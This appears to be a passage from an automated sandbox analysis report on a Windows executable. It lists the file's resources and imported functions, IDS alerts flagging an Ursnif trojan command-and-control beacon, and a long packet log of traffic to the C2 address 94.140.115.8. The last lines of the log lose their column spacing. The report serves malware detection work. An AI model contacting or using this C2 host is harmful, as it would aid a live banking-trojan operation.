                            RT_ICON        0x93828  0x8a8   dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0                         English   United States
                            RT_ICON        0x940d0  0x568   GLS_BINARY_LSB_FIRST                                                                                                            English   United States
                            RT_DIALOG      0x94638  0xb4    data                                                                                                                            English   United States
                            RT_DIALOG      0x946f0  0x120   data                                                                                                                            English   United States
                            RT_DIALOG      0x94810  0x158   data                                                                                                                            English   United States
                            RT_DIALOG      0x94968  0x202   data                                                                                                                            English   United States
                            RT_DIALOG      0x94b70  0xf8    data                                                                                                                            English   United States
                            RT_DIALOG      0x94c68  0xa0    data                                                                                                                            English   United States
                            RT_DIALOG      0x94d08  0xee    data                                                                                                                            English   United States
                            RT_GROUP_ICON  0x94df8  0x4c    data                                                                                                                            English   United States
                            RT_VERSION     0x94e48  0x290   MS Windows COFF PA-RISC object file                                                                                             English   United States
                            DLL           Import
                            msvcrt.dll    fgetwc, strcoll, srand
                            GDI32.dll     GetBkColor, ExtSelectClipRgn, GetTextMetricsW, GetCharWidthFloatA, GetCharWidth32A, GetTextCharacterExtra, GetCharWidthA, GdiComment
                            KERNEL32.dll  GetStringTypeA, WriteProcessMemory, GetCommTimeouts, GetConsoleCP, EnumResourceTypesA, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetLargestConsoleWindowSize, EraseTape, GetDiskFreeSpaceExA, lstrlenA, GlobalMemoryStatus, GetModuleFileNameA, GetBinaryTypeA, DebugBreak
                            ADVAPI32.dll  RegGetValueA, GetFileSecurityA, EnumServicesStatusExW, InitiateSystemShutdownExW
                            mscms.dll     GetColorDirectoryW
                            USER32.dll    GetClientRect, GetClassNameA, GetPropW, GetScrollBarInfo, DeleteMenu, MessageBoxIndirectW, GetMenuItemRect, GetMessagePos, DefMDIChildProcW, GetUpdateRgn, LoadMenuA, GetQueueStatus, GetMessageW
                            OLEAUT32.dll  LoadTypeLibEx, GetRecordInfoFromTypeInfo
                            Description       Data
                            LegalCopyright    A Company. All rights reserved.
                            InternalName
                            FileVersion       1.0.0.0
                            CompanyName       A Company
                            ProductName
                            ProductVersion    1.0.0.0
                            FileDescription
                            OriginalFilename  myfile.exe
                            Translation       0x0409 0x04b0
                            Language of compilation system  Country where language is spoken  Map
                            English                         United States
                            Timestamp                 Protocol  SID      Message                                                    Source Port  Dest Port  Source IP    Dest IP
                            04/28/22-15:47:50.266267  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49759        80         192.168.2.4  94.140.115.8
                            04/28/22-15:47:52.636763  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49759        80         192.168.2.4  94.140.115.8
                            04/28/22-15:47:51.337694  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49759        80         192.168.2.4  94.140.115.8
                            Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                            Apr 28, 2022 15:47:50.154853106 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.218705893 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.218843937 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.266267061 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.320728064 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638051987 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638118029 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638174057 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638236046 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638288975 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.638313055 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.638349056 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638394117 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638417006 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638451099 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638520956 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.638530970 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.638581038 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638623953 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.638645887 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.638681889 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.726372004 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726438999 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726490021 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726505041 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.726519108 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.726572990 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726584911 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.726670027 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726720095 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.726751089 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726792097 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.726804972 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.726833105 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726881027 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.726908922 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726959944 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.726972103 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.727008104 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.727075100 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.727114916 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.727133989 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.727178097 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.727196932 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.727238894 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.727242947 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.727287054 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.776987076 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.777057886 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.777101994 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.777141094 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.777159929 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.777196884 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.777245045 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.777256012 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.777292013 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.777318001 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.777363062 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.805203915 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.805263042 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.805308104 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.805382013 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.805407047 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.805668116 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.805738926 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.833364010 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833420038 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833460093 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833483934 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.833512068 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.833556890 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833636045 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.833705902 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833755016 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833769083 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.833798885 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.833830118 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833878040 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833890915 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.833925009 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.833950043 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.833991051 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.834007978 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.834045887 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.834068060 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.834115028 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.834126949 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.834172964 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.872472048 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.872628927 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.881824970 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.881871939 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.881913900 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.881953955 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.881974936 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882004976 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882044077 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.882057905 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882092953 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882117033 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.882174969 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882219076 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.882268906 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882337093 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.882375956 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.882395029 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882424116 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882481098 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.882525921 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882566929 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.882613897 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.882657051 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.882704973 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.888736010 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.888778925 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.888818979 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.888858080 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.888876915 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.927875042 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.927942991 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.927987099 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.928030968 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.928056955 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.928109884 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.928162098 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.928175926 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.928205013 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.928234100 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.928275108 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.929815054 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.929861069 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.929898024 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.929919958 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.929939032 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.929980040 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.933605909 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.933710098 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976166010 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976196051 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976227999 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976243973 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976264954 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976280928 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976291895 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976316929 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976325035 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976352930 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976366043 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976399899 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976648092 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976672888 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976697922 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976706028 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976722956 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976739883 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.976964951 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.976991892 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.977030993 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.977041960 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.977081060 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.982196093 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.982223034 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.982247114 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:50.982307911 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.982362986 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:50.999259949 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.000253916 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.025690079 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.025724888 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.025751114 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.025774002 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.025820017 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.025924921 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.025942087 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.025960922 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.025971889 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.026014090 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.027251005 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.027282953 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.027302027 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.027371883 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.027399063 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.027434111 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.027456045 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.027482033 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.027502060 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.027513981 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.027829885 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.034410954 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.034437895 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.034461975 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.034488916 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.034509897 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.073473930 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.073555946 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.084990025 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.085028887 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.085057974 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.085151911 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.085184097 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.086232901 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086258888 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086276054 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086293936 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086304903 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.086323023 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086332083 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.086348057 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086375952 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.086441994 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.086514950 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086533070 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086550951 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.086579084 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.086615086 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.101583004 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.101609945 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.101629019 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.101737976 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.155438900 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.155518055 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.155563116 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.155654907 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.155695915 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.157845974 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.157887936 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.157929897 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.157968998 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.157987118 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.158023119 CEST  49759        80         192.168.2.4   94.140.115.8
                            Apr 28, 2022 15:47:51.158046007 CEST  80           49759      94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:51.158085108 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158109903 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158138990 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158198118 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158238888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158257961 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158304930 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158318996 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158364058 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.161838055 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.161948919 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.180875063 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.180948973 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.180983067 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.181211948 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.238802910 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238836050 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238859892 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238882065 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238904953 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238926888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238984108 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.239007950 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.241864920 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.241888046 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.241908073 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.241952896 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.241969109 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.241991043 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.242043972 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.242093086 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.337693930 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.413091898 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747339010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747370958 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747390032 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747409105 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747426987 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747445107 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747459888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747492075 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.747548103 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.747670889 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747692108 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747710943 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747725010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747736931 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.747785091 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.808720112 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.808751106 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.808767080 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.808779001 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.808840036 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809001923 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809202909 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809248924 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809267044 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809276104 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809293032 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809318066 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809335947 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809349060 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809375048 CEST804975994.140.115.8192.168.2.4
